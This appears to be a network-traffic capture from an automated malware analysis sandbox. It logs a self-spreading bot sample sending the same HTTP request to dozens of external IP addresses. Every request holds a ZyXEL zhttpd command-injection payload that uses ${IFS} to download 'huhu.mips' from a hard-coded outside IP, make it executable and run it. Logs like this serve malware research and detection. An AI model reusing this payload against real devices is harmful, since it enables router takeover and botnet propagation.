                                                  Jan 19, 2024 18:23:50.960324049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3288192.168.2.1341068167.246.240.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960374117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3289192.168.2.135751692.194.5.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960414886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3290192.168.2.134652824.247.37.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960462093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3291192.168.2.134705035.53.47.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960500002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3292192.168.2.13524301.173.8.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960556984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3293192.168.2.135838662.26.127.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960585117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3294192.168.2.1341010211.206.89.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960637093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3295192.168.2.1354612132.118.221.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960683107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3296192.168.2.134728888.178.5.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960725069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3297192.168.2.1344514155.32.255.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960772038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3298192.168.2.1338100181.116.82.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960793972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3299192.168.2.1359434153.47.92.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960830927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3300192.168.2.135673614.78.118.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960890055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3301192.168.2.134185060.69.75.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960923910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3302192.168.2.1344950178.229.254.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960971117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3303192.168.2.135705841.246.90.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961005926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3304192.168.2.135128449.1.47.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961044073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3305192.168.2.133795048.37.186.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961066008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3306192.168.2.1343174221.186.252.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961108923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3307192.168.2.1334100142.204.128.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961152077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3308192.168.2.135142464.245.249.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961235046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3309192.168.2.1345012120.106.55.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961251020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3310192.168.2.134962252.89.111.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961287975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3311192.168.2.1339450128.126.206.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961318970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3312192.168.2.1360798124.126.167.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961369991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3313192.168.2.133625834.85.127.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961404085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3314192.168.2.1351346131.87.207.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961426973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3315192.168.2.1343762121.74.74.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961452007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3316192.168.2.1360412191.196.40.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961497068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3317192.168.2.134022814.1.130.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961561918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3318192.168.2.1334292194.184.178.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961568117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3319192.168.2.1338950219.97.38.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961613894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3320192.168.2.135406299.105.33.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961647987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3321192.168.2.135340481.82.202.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961690903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3322192.168.2.133871836.185.249.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961709023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3323192.168.2.1346856131.98.181.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961744070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3324192.168.2.134316679.21.57.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961796045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3325192.168.2.1345298189.43.173.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961817980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3326192.168.2.1352014180.130.113.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961868048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3327192.168.2.1356090110.117.62.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961894989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3328192.168.2.1343908114.222.154.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961949110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3329192.168.2.1334070140.115.209.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.961973906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3330192.168.2.13389102.206.163.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962007999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3331192.168.2.13569268.37.224.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962071896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3332192.168.2.1333412104.255.125.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962152004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3333192.168.2.133693657.80.96.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962165117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3334192.168.2.1341024115.136.158.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962203026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3335192.168.2.134733292.229.146.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962245941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3336192.168.2.133837635.149.15.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962290049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3337192.168.2.1339648146.14.146.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962340117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3338192.168.2.135748053.220.156.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962378979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3339192.168.2.135251452.184.50.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962402105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3340192.168.2.1336658102.47.252.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962444067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3341192.168.2.134850048.74.169.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962501049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3342192.168.2.133332667.62.32.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962539911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3343192.168.2.133487245.202.62.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962584972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3344192.168.2.133909624.83.3.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962641001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3345192.168.2.1347084106.23.36.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962694883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3346192.168.2.1359860181.199.81.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962742090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3347192.168.2.1338614143.187.156.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962779999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3348192.168.2.1351926195.192.68.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962794065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3349192.168.2.1339496145.1.203.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.962862015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3350192.168.2.133497696.131.20.211443
                                                  TimestampBytes transferredDirectionData
